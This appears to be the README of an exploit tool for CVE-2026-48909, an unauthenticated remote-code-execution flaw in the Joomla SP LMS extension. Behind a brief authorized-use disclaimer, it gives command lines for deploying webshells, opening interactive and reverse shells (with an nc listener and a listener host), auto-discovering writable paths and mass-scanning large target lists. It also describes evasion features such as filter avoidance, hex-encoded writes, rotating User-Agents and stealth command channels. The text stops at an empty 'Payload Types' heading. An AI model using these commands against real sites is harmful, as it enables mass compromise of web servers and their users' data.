[!IMPORTANT]
Authorized use only. This tool is for security research, education, and testing systems you own or have explicit written permission to assess. Unauthorized access to computer systems is illegal. The author assumes no liability for misuse.
Table of Contents
Overview
CVE-2026-48909 is a critical unauthenticated PHP Object Injection in the Joomla SP LMS extension. This tool implements the full attack chain so security professionals can validate impact in lab or authorized environments.
It covers detection, path discovery, payload delivery, interactive post-exploitation (where permitted), mass assessment, and optional cleanup.
Vulnerability Details
| Attribute | Value |
|---|
| CVE ID | CVE-2026-48909 |
| CVSS | 9.5 (Critical) |
| Attack Vector | Network — unauthenticated |
| Impact | Remote Code Execution |
| Affected Product | Joomla SP LMS |
| Affected Versions | 1.0.0 – 4.1.3 |
| Patched Version | SP LMS 4.1.4+ |
| Gadget Chain | Requires Joomla < 5.2.2 |
Compatibility Matrix
| Component | Version | RCE |
|---|
| SP LMS | < 4.1.4 | Vulnerable |
| SP LMS | ≥ 4.1.4 | Patched |
| Joomla | < 5.2.2 | Gadget chain usable |
| Joomla | ≥ 5.2.2 | Gadget chain patched |
Features
Core
| Capability | Description |
|---|
| Unauthenticated exploit | No credentials required |
| Multiple payloads | 7 webshell / execution variants |
| Interactive shell | Command history session after deploy |
| Path discovery | Automatic writable path probing |
| Cleanup | Remove deployed webshell after tests |
Assessment & Ops
| Capability | Description |
|---|
| Mass scanning | Multi-threaded target lists (1000+) |
| Proxy support | HTTP/SOCKS (Burp, ZAP, etc.) |
| Reverse shell | Listener-based payloads |
| Stealth mode | Header / POST-oriented command channels |
| Randomization | UUID shell names, User-Agent rotation |
| Reporting | Export as JSON, HTML, or CSV |
| Detection assists | Joomla version checks, --check-only, --safe-mode |
Evasion Notes
- Avoids characters blocked by Joomla’s
cmd filter where possible
- Hex-encoded PHP write path to reduce base64 padding / slash issues
- Configurable delays and rotating User-Agents
- Retry logic across multiple injection / path candidates
Installation
Prerequisites
- Python 3.6+
pip
- Network reachability to target(s) under test
Setup
cd exploit
python3 -m venv venv
source venv/bin/activate # Windows: venv\Scripts\activate
pip install -r requirements.txt
python3 "CVE-2026-48909 v3.0.py" --help
Dependencies
requests>=2.31.0
urllib3>=2.0.0
argparse ships with the Python standard library; it does not need to be installed via pip.
Quick Start
Replace https://target.example with a lab or authorized target only.
Single target — discover path + interactive shell
python3 "CVE-2026-48909 v3.0.py" https://target.example --find-path --interactive
Safe checks (no exploitation)
python3 "CVE-2026-48909 v3.0.py" https://target.example --check-only
python3 "CVE-2026-48909 v3.0.py" https://target.example --safe-mode
Mass scan
python3 "CVE-2026-48909 v3.0.py" --targets targets.txt --threads 20 --export results.html --export-format html
Reverse shell (authorized lab)
# Listener
nc -lvnp 4444
# Exploit host
python3 "CVE-2026-48909 v3.0.py" https://target.example \
--find-path \
--shell-type reverse \
--reverse-host 192.168.1.100 \
--reverse-port 4444
Usage Guide
Path discovery
python3 "CVE-2026-48909 v3.0.py" https://target.example --find-path
Known writable path
python3 "CVE-2026-48909 v3.0.py" https://target.example --path /var/www/html/tmp/shell.php
Interactive session
python3 "CVE-2026-48909 v3.0.py" https://target.example --find-path --interactive
One-shot command
python3 "CVE-2026-48909 v3.0.py" https://target.example --path /tmp/x.php --cmd "id"
Stealth payload + interactive
python3 "CVE-2026-48909 v3.0.py" https://target.example --shell-type stealth --find-path --interactive
Proxy (Burp / ZAP)
python3 "CVE-2026-48909 v3.0.py" https://target.example \
--find-path --interactive \
--proxy http://127.0.0.1:8080 \
--insecure
Cleanup
python3 "CVE-2026-48909 v3.0.py" https://target.example --cleanup /tmp/x.php
https://lab-a.example
https://lab-b.example
https://lab-c.example
python3 "CVE-2026-48909 v3.0.py" -T targets.txt --threads 50 --export scan.json
Command Reference
Target
| Argument | Description |
|---|
target | Single target URL |
--targets, -T FILE | File of targets (one URL per line) |
--path PATH | Absolute server path for webshell |
--shell-type TYPE | minimal, standard, stealth, base64, full, reverse, blindshell |
--shell-name NAME | Webshell filename (default: x.php) |
Network
| Argument | Description |
|---|
--timeout SECONDS | Request timeout (default: 15) |
--insecure | Skip TLS certificate verification |
--proxy URL | e.g. http://127.0.0.1:8080 |
--random-ua | Rotate User-Agent (enabled by default) |
--delay SECONDS | Delay between requests |
Reverse shell
| Argument | Description |
|---|
--reverse-host HOST | Listener host |
--reverse-port PORT | Listener port |
Modes
| Argument | Description |
|---|
--interactive, -i | Interactive shell after deploy |
--check-only | Vulnerability check only |
--safe-mode | Non-destructive testing |
--find-path | Auto-discover writable path |
--cmd COMMAND | Run one command and exit |
--cleanup PATH | Remove webshell at path |
--cleanup-after | Cleanup after exploitation |
Mass scan / report
| Argument | Description |
|---|
--threads NUM | Worker threads (default: 10) |
--export FILE | Output path for results |
--export-format FORMAT | json, html, csv (default: json) |
Logging
| Argument | Description |
|---|
--log-file FILE | Write logs to file |
--quiet, -q | Quiet mode |
--verbose, -v | Verbose output |
--no-banner | Hide banner |
Payload Types